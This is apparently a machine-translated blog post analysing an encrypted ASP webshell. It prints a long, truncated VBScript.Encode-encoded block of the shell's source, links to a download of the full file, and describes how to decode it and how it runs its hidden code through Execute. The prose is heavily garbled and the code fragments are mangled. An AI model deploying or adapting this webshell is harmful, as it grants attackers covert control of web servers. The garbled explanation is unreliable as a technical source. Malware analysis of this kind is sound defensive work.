The webshell is encrypted randomly. decryption is good and should be avoided. On the Rise, decryption came out, and found that shell is not simple, and many people are obligated to work.
Encryption source code
Program code
<% @ LANGUAGE = VBScript. Encode %>
<% #@~ ^ 3A4CAA ==##@ & jdDhl/kr1v2FX! ZFE ~, PP ,~ P, @ # @ & sHC: r random encryption J ~ P ~~ @ & JkDnj "SxE4YY2lJzAhS 4l ^ 0 + MRmK: r ~ P, P ~ P, P ~ @ & ZWazDbotDxEbUn random encryptor rP ~ P ~~, P ~ P ,~ P, @ &) random encryption of gj e ~, P ~ P ,~, P ~, P, PP, P ,~ P, P ###########@ & ksLEMVr @! R: TPkD ^ v4DY2) J & wFRrhmo + d + yRXFbhTF 1 WszvZ! Z & oKN {obDs {JG08 {FR4G9T1Ny 14 T, X {6Fn0Of0R % {f9RorWEPAk9O4ql !, T + bo4O2! @*@! JkhL @ * JP ,~ B exquisite horizontal bar B. No need to change the image @! TM @ * @ # @ & (L {J :! TTZ! TJ ,~ B. Set the background color. @ # @ & A "{JaTT60T! R ~, B. Set the text color. @ # @ & 4! NE {J [osws/ZrP ~ V sets the button dialog box color @#@&?. DRU ^. kaY: kh + G; D1, O1, O, 11 = I + d2Kxd + c $! 0WD, YMElr P3DMW .~ "+ /! H +, 1 + XOl /! 4 ,? 4WA3MDc # = (0, 2..., KtnU ##&] IUE @! 4 .@*@! MPtM + 6xBNl-lkm.raY) 4r/DWDH 8l13v # v @*@! 8 m @*~ J, PAD. G +/^. bwOkKU ,[~ R @! Jl @*@! 4 m @ * J # @ & 3DMR/slD =] + kwW dnRwV! /4 @ # @ & 3 N ~ Q6 @ # @ & x [~ KE4lj! 4 ~ I "jv/OM # = D + kwKU/RADbYnckYD * l2 NPU; 8) wE mOkGU, InnmOtv? Bl "+ nCO4] + asmmnv? BJ-r ~ Rw-r # l2 N ~ O! XmDrW) s! U ^ YbW P] InKmY4 'ub) "InKmYtx] wsl1nv? Sr-J ~ R-rb) Ax [PwEU ^ DkW lj "S" n5E/DRj +.-D # lMrl (VndvJj] Jr # l ?. 7 +. & n {I + $ EdYc? ND7 +. # mDkm8V/'20176zzs | b9f] E *) mDrW] n $ E + dOvJ) mDrKxE *) "WWDnmOt {? ND7 +. tlwhCY4 'jceb) qqIGWOxU +... Rtl2KmYtcEJJb )! XM + 5! + KYRk + M-+ MCDbl8s/'r4ydw {4 GdYr # LE. vl2 {Ed + M2lk/l2K/E. s {J4YD2r) oKV9 + DhlD4 "+ 5E/OcrsW ^ [+ MnlD4E # = sglh + x]; + kO 'rshcs + Jbl ~ L ^ 3'. ^ E @! 4 m @*@! (D @*@! MxO + M @*@! C, tDWELl7CdmMkaYltrdDW. Xc8l13cbE @ * return @! & C @*@! & MUD +. @ * J = 0E mDrW PWl1 + c/KVWMS? By ~ JC. # = k6Pjk "xZPOtU @ # @ &/r" {JJ @ # @ & Vd + # @ & kk "{J,/k. + {vJL? RyLJvE = + x9 ~ K6) 0m ^ nr @! WrHK ~ Wmmnqn49kULkPmGsKDxB [ELZG ^ WM [JEPr? ByJ @ * J # mD [r @! Zwr1: @ * E) Ax9PWEU ^ DkGx = oE mOrKxPitU? CW (% kY. *) K4LkYM ~, Inw ^ l ^ nvW4NdYM ~ PrESPrJrJb) oGMPrP {~ F, KG ~ D + xcG (LdYMb = qW, hbn' K4NdYM ~~ KBPqb ,@! @ *, E ∞ J, KtU # @ &, Pg +? O .,~ Hb ['k4% dDD ~~ RBPq #, 1nS? DD ##@ & PAs/##@ & P, 1 nAUYD, xp74zm?plpg +? O .@#@&~ 2 [P & 0 @ # @ & g + 6O @ # @ & jt? U ~ {PHhUYD = 2 [PwEUmDkGU =? Tbjl J @*~ DDM ∞ W sVG.1 /~ PU] I, xn4DPUGbY ^ B, W & ∞ Pz9W (@! PkDM ∞ @ * Yak. mkz @! J "I ∞ 8 pnEMYP.; YDp # cYrh (EdRs. Ww49I {SHPuM + Uxb 14 CpoaP, +! Sl7Rnomn hMWs (9iMY/, x ~ +! Vm DOj ^; jRs. Ww49Np +/sC6PUD! ODI * "Is it a sentence dp? Check vYMnVm B! 8 @! 4OTx + ^ DD/'6rni/^ lWPU .! YnDpb "check whether it is a serial connection Database Data Count check. Please vY. n ^ l bX @! TOo n ^ Rn! VmRMYU8fc:. Ww49c6k * LwBDYkc. YUV $? SV; o, xGkD ^ x! 0j] "∞ 8in; MY ~ XM; D +.) iYk $ MYU ~, +; Vm. D? V $ jRsDWw89/^ + NibDb $. YUcYM + sCP # qx {kc0b ~ /S8p @ * DY nmJ @!. The JpU input, input, and Database Data Count have been confirmed successively. @ *. nDx + 1 @! DHK _. nx kcm8lI ~ {PnE ^ CcDOj ^ ;? HMWo4GIYk, MYUP, +! Sl7R. YU49 sDWw8fP #&{@! R'6kp. The Section text before section 15 shows that only a few pieces of data can be used to query control lines over xwR, you can display the full section of the Section and text in real time ~ XY q $ MO? P? J) hP1idr/Ph6 "f ~ Y + sl1V (CK] P3S ~ BP ~ "2Kd) P {TF8,. YUi * F']) _ Z] bj ~? UbK ~ GHjJ6; P9fz ~ Y + hm1V4mK] ~ 2dA) K, I3PdbP {D! 8 $ DDjIT: m1nV8C: $ ~ 2d $ B: PK6 "fPx ~ Y, DDjp # bZ * vIb_Z ")., i3 ........................................ .... omitted %>
The code is too long. It is too long to copy the file.
Click to download this file
First, it is a vbscript.encodeencryption, and the weak screnc.exe encryption compatibility is good. There are many online decryption tools for decryption on the Internet. You can use the VBscript. Encode decoder to decrypt the files. However, pay attention to handling special characters.
After VBScript. Encode is decrypted, it looks like a bunch of garbled characters, but at this time, we can find that many function codes have come out. You can see that this is the custom function encryption, and then ExeCuTe the Code through ExeCuTe decryption.
Generally, encrypted pages include static encryption pages and dynamic encryption pages. For dynamic encryption pages, you generally need to set up iis for decryption. Here, the first encryption code is used. The colon (:) in both Chinese and English characters encrypted in vbs is the code connector, which is equivalent to the carriage return symbol. The first encryption code can be extracted as follows:
Program code UZSS = NewStr: End Function: ShiSan = "> srr ∞ on = llorcs SRR neht = noitcA fI ∞ ydob <srr ∞> tpircs/<SRR ∞}; eurt nruter ;) (timbus. mroFbD; = LMTHrenni. CBA; gp = eulav. egaP. mroFbD; rts = eulav. rtSlqS. mroFbD}; eslaf nruter ;)! Are you sure you want to check the LQS? (trela {) 01
